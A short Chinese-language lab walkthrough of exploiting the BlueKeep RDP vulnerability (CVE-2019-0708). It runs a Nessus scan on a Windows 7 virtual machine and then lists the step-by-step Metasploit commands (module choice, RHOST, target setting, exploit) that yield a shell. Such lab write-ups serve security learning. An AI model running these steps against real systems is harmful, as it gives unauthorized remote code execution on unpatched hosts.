【CVE-2019-0708】远程桌面服务远程执行代码漏洞
当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时,远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。
靶机: windows7 IP:192.168.64.178
攻击机:KALI2022 IP:192.168.64.157
漏扫工具:Nessus
1.发现漏洞
使用Nessus对靶机进行漏洞扫描,发现存在【CVE-2019-0708】远程桌面服务远程执行代码漏洞。
2.漏洞利用
使用kali并启动msfconsole
搜索CVE-2019-0708可利用的EXP
# search 0708
使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# use 1
设置参数
set RHOST 192.168.64.178
set target 5 #因为靶机是vmware创建的虚拟机,因此这里选择5,可根据实际情况选择
执行攻击
# exploit
成功获取权限,可执行shell
成功的关键:需要windows7靶机关闭防火墙,并且开启远程桌面。